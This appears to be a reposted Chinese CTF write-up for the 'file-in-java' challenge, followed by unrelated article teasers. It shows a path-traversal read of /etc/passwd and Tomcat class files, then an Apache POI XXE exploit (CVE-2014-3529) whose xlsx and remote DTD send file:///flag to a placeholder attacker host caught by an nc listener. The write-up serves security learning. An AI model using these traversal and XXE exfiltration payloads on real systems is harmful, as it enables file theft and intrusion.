flag{网鼎杯之java代码审计入门} - file-in-java[ctf]

news2025/1/12 21:54:00

一、赛题截图

image-20230730181311006

二、接口测试

  1. 我们先上传文件抓包,发送到repeter

    image-20230730181727635

    响应如下

    截屏2023-07-30 18.27.06

  2. 我们使用下载接口去下载一个不存在的文件,回显“资源被删除”

    image-20230730182626919

    - 说明系统可能去查找了这个文件,那我们能不能去下载/etc/passwd文件,但是还不知道相对路径是啥

三、任意文件读取漏洞验证

  • 那我们去测试一下下载文件夹

    image-20230731013406841

  • 我们根据路径可以推测到/etc/passwd文件路径

    1. 上传文件的路径为
    /usr/local/tomcat/webapps/file_in_java/WEB-INF/upload/0/10/上传文件名
    ​
    2. 那/etc目录是跟/usr一层级的,上图有九层目录,应该回退九层
    /usr/local/tomcat/webapps/file_in_java/WEB-INF/upload/0/10/../../../../../../../../../etc/passwd
    ​
    3. 则我们下载文件的参数应该为
    ../../../../../../../../../etc/passwd
  • 根据上面推理构造请求,成功获取/etc/passwd文件内容,yeah

    image-20230730184024947

  1. 拿到了/etc/passwd的文件内容有什么用,怎么才能getshell啊

    通过上面的一些测试,我们可以知道任意文件下载的漏洞存在该系统, 上传shell也无法执行

    那我们只能看看能不能拿到源码审计看看了

  • 通过暴露的上传文件存储的路径得知web服务器为tomcat

    /usr/local/tomcat/webapps/file_in_java/WEB-INF/upload/0/10/

  • 前置知识

    Tomcat的web.xml是一个XML文件,用于配置Web应用程序的部署信息和其他相关配置。 它通常位于Web应用程序的WEB-INF目录下。 web.xml文件中包含了大量的配置信息,其中最重要的是Web应用程序的servlet、过滤器和监听器等组件的配置,是tomcat的核心配置文件。

  • 读取web.xml文件,可以看到有三个接口类

    image-20230730193751174

  • 拿到接口class文件,根据tomca结构,我们知道class文件都在WEB-INF目录下

    构造路径../../../../../../../../../../usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/具体类路径,成功获取文件内容

    image-20230730195933666

  • 浏览器通过下载三个类文件,如下图所示

    image-20230730200123970

四、代码审计

idea打开这几个class文件

  • 查找flag关键词,文件名只要包含flag字符就会被ban

    image-20230730201346435

  • 看看其他文件有没有能够下手的地方

    • ListFileServlet.class文件,只是返回保存的文件名作用,应该是通过上传接口完成之后调用的

      image-20230730201850058

    • 仅剩UploadServlet接口了,发现可疑的一段代码,里面提到了xlsx文件格式,好像做了不一样的处理

      image-20230730202234209

      我们让chatgpt给我们解释一下代码啥意思啊!

      首先说一句chatgpt真香啊

      关注图片标红部分,说明我们要通过一个excel-xx.xlsx文件利用apache poi库搞事情

      image-20230730202533041

五、Apache POI库漏洞利用

Apache POI 简介是用Java编写的免费开源的跨平台的 Java API,Apache POI提供API给Java程式对Microsoft Office(Excel、WORD、PowerPoint、Visio等)格式档案读和写的功能

  • 即然用到了POI库,那我们看看这个库是否有漏洞存在!代码中给出的POI库版本为3.10,是否有漏洞,google一下你就知道

    CVE-2014-3529       apache poi 在3.10.1之前存在XXE漏洞
  • 复现CVE-2014-3529

    • 新建一个excel文件并解压(linux unzip命令即可解压 ‘.xlsx’ 文件)

      mkdir tmp_excel       //新建一个目录存放解压后的文件目录
      touch 1.xlsx           //新建一个excel文件
      unzip 1.xlsx  -d tmp_excel      //解压到指定目录
      cd tmp_excel                    //进入目录
      ls                              //查看解压后的文件

      解压后的效果如下图所示:

      截屏2023-07-30 21.36.45

    • 在[Content_Types].xml文件中添加payload,(在第一句和第二句中间添加下面给出的payload)

    payload解释

    代码中的实体 remote 定义了一个外部实体,其系统标识符(System Identifier)为 "http://your-remote-ip/file.dtd"。然后,通过 %remote; 引用了这个实体,将其包含到当前XML文档中。然后通过该外部实体 %int;%send; 执行一些操作

     <!DOCTYPE convert [
     <!ENTITY % remote SYSTEM "http://you-remote-ip/file.dtd">
     %remote;%int;%send;
     ]>

    效果如图所示

    截屏2023-07-30 21.23.33

    • 打包回xlsx文件,根据前面的代码分析,文件名得为excel-x.xlsx

      zip excel-1.xlsx ./*
    • 去我们的远程服务器编辑一个file.dtd

      payload解释

      1. %file 定义了一个实体,通过 file:///flag 指定为一个文件路径。读取本地文件系统上的 flag 文件。

      2. %int 定义了另一个实体,通过 http://your-ip:port?popko=%file; 将读取到的文件内容发送给指定的IP地址和端口,我们通过nc在该ip所在服务器上监听这里指定的端口。

      3. 目的是读取 flag 文件,并将其内容发送到指定的服务器上。

      <!ENTITY % file SYSTEM "file:///flag">
      <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://your-ip:port?popko=%file;'>">

      远程服务器80端口启动http服务,使通过http://your-remote-ip/file.dtd能访问到file.dtd资源

    • nc监听端口,准备接受flag文件内容

      nc -lvvnp port        //port为你file.dtd里指定的端口
  • 上传xlsx文件测试

    image-20230731013600470

    http服务成功接收到file.dtd的请求

    image-20230730220550321

    nc成功收到flag文件的内容

    image-20230730220348251

六、总结

  • 任意文件下载(读取)

  • Apache POI XXE

脚踏实地的每天进步一点点,不跟别人相比,只超越自己就够了。

如果你觉得还不错,欢迎关注公众号

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/815326.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

HTML5中的data-*属性

介绍&#xff1a; data-*全局属性是一类被称为自定义数据属性的属性&#xff0c;它赋予我们在所有 HTML 元素上嵌入自定义数据属性的能力。 data-*的使用 <div class"child" data-name"小红" data-age"18"></div> 在js里有两种获…

无涯教程-jQuery - height( val )方法函数

height(val)方法设置每个匹配元素的CSS高度。 height( val ) - 语法 selector.height( val ) 这是此方法使用的所有参数的描述- val - 这是元素的高度。如果未指定任何显式单位(如em或&#xff05;)&#xff0c;则将" px"连接到该值。 height( val ) - 示例…

Xshell使用是出现全黑或全白问题

Xshell使用是出现全黑或全白问题&#xff0c;这是我实际遇到的问题如图。 解决方式&#xff1a; 设置字体 解决成功&#xff1a;

uniapp uni-combox 下拉提示无匹配项(完美解决--附加源码解决方案及思路)

问题描述 匆匆忙忙又到了周一啦&#xff0c;一大早就来了一个头疼的问题&#xff0c;把我难得团团转&#xff0c;呜呜呜~ 下面我用代码的方式展示出来&#xff0c;看下你的代码是否与我的不同。 解决方案 <uni-forms-item label"名称" name"drugName&quo…

Mybatis-plus集合

目录 mybatis-plus集合1、简介2、特性3、开始使用4、QueryWrapper的使用5、补充 mybatis-plus集合 1、简介 MyBatis-Plus &#xff08;简称 MP&#xff09;是一个 MyBatis的增强工具&#xff0c;在 MyBatis 的基础上只做增强不做改变&#xff0c;为简化开发、提高效率而生。 m…

八股文的天花板,没到 35k 的 Java 开发都值得好好读一读

确实&#xff0c;在当下行情之下&#xff0c;还能保持“有恃无恐”的人&#xff0c;那他自身肯定得有两把刷子。 谁不想当一个“技术大牛”&#xff1f; 谁不想年纪轻轻就“年薪百万”&#xff1f; 但“梦想美好&#xff0c;现实残酷”&#xff0c;不少人实际工作中做的事&a…

C#中 使用yield return 优化大数组或集合的访问

概要 我们在开发过程中&#xff0c;经常需要在一个很大的数组或集合中搜索元素&#xff0c;以满足业务需求。 本文主要介绍通过使用yield return的方式&#xff0c;避免将大量数据全部加载进入内存&#xff0c;再进行处理。从而提高程序的性能。 设计和实现 基本业务场景&a…

如何压缩MP4视频?学会这样压缩很简单

怎么压缩MP4视频大小呢&#xff1f;如果需要将视频存储在手机或平板电脑等设备上&#xff0c;通常也需要将视频大小压缩到适当的大小&#xff0c;以节省存储空间。此时&#xff0c;可以根据设备的存储容量和需要存储的其他文件来选择视频压缩的大小。很多小伙伴不知道怎么压缩视…

24考研数据结构-第三章:栈和队列

目录 第三章 栈和队列3.1栈&#xff08;stack&#xff09;3.1.1栈的基本概念栈的基本概念知识回顾 3.1.2 栈的顺序存储上溢与下溢栈的顺序存储知识回顾 3.1.3栈的链式存储链栈的基本操作 3.2队列&#xff08;Queue&#xff09;3.2.1队列的基本概念3.2.2队列的顺序存储结构3.2.2…

Python基础教程:Socket网络编程

网络编程是指编写程序使其能够通过网络连接与其他计算机进行通信。Python 作为一种强大的脚本语言&#xff0c;也提供了丰富的库来支持网络编程&#xff0c;如 socket、asyncio、http.client 等。在这篇教程中&#xff0c;我们将介绍如何使用 socket 库实现简单的网络编程。 1…

基于react18+hooks通用全局手机端弹框组件

RcPop 基于react18.x hooks自定义msg/alert/dialog/model/toast弹框组件 基于react18 hook开发全局通用mobile弹层组件。整合了msg/alert/dialog/toast及android/ios等弹窗效果。支持**20**参数、组件式函数式两种调用方式。 引入弹窗组件 在需要使用到弹窗的页面引入组件。 …

Linux - 添加普通用户为信任用户

1.添加用户 在Linux系统中&#xff0c;可以使用以下步骤添加用户&#xff1a; 打开终端并以root用户身份登录 输入以下命令以创建新用户&#xff08;请将username替换为您想要创建的用户名&#xff09;&#xff1a; adduser username 设置该用户的密码&#xff0c;使用以下命…

MySQL报错:Row size too large。

项目场景&#xff1a; mysql添加varchar字段 问题描述 mysql表添加一个varchar类型的字段&#xff0c;执行保存时报错&#xff1a;Row size too large. The maximum row size for the used table type, not counting BLOBs, is 6553 巴拉巴拉 原因分析&#xff1a; 行数据大…

「2024」预备研究生mem- 0730 逻辑模考

逻辑题记录&#xff1a; 前真后假&#xff0c;前假后真 削弱&#xff0c;前者更强 前假后假 是支持

迅为iTOP-LS3A5000开发板+银河麒麟操作系统

硬件准备 1.M.2.ssd硬盘&#xff08;最好大于等于128G&#xff09;&#xff1b; 2.迅为LS3A5000开发板&#xff1b; 3.U盘&#xff08;需大于8g&#xff09;&#xff0c;制作启动盘使用&#xff1b; 4.hdmi显示器&#xff1b; 5.搭载linux环境的计算机。 安装步骤 1 制作…

聚焦甲烷循环,宏基因组分析项目再创新!

甲烷&#xff0c;化学式CH4&#xff0c;在自然界分布很广&#xff0c;是最简单的有机物&#xff0c;也是最简单的烃。但同时也是一种重要的温室气体&#xff0c;是一种仅次于二氧化碳的强大温室气体&#xff0c;对环境和全球变化具有重大影响&#xff0c;其导致全球变暖潜力是C…

运动带哪种耳机比较好、最好用的运动耳机排名

作为一位热爱运动的达人&#xff0c;每天固定时间出门跑步已经成为我的必修课程。关于坚持锻炼的好处&#xff0c;我想不用多说&#xff0c;懂得人自然懂。然而&#xff0c;无论多么享受独自奔跑的感觉&#xff0c;总会有一种孤单寂寞的情绪袭上心头。相信经常跑步的朋友们都深…

如何部署Redis哨兵与集群

目录 一、Redis数据库 二、Redis哨兵模式 三、部署Redis哨兵 第一步 关闭防火墙和安全机制 第二步 修改Redis配置文件 第三步 开启Master主节点 第四步 查看哨兵信息 四、如何部署Redis集群 第一步 创建不同端口节点的目录 第二步 创建脚本文件 第三步 赋权并执行脚…

vscode设置远程登录和免密登录

首先&#xff0c;我们去官网下载VScode 安装过程比较简单&#xff0c;大家自行安装即可&#xff0c;注意建议安装在除C盘外的其他盘中。 安装完成后&#xff0c;打开我们下载好的VScode&#xff0c;点击左侧的Extensions选项&#xff0c;搜索Remote&#xff0c;Install第一项R…

【设计模式——学习笔记】23种设计模式——代理模式Proxy(原理讲解+应用场景介绍+案例介绍+Java代码实现)

介绍 基础介绍 代理模式为一个对象提供一个代理对象&#xff0c;以控制对这个对象的访问。即通过代理对象访问目标对象&#xff0c;这样做的好处是&#xff1a;可以在不修改目标对象代码的基础上&#xff0c;增强额外的功能操作&#xff0c;即扩展目标对象的功能被代理的对象…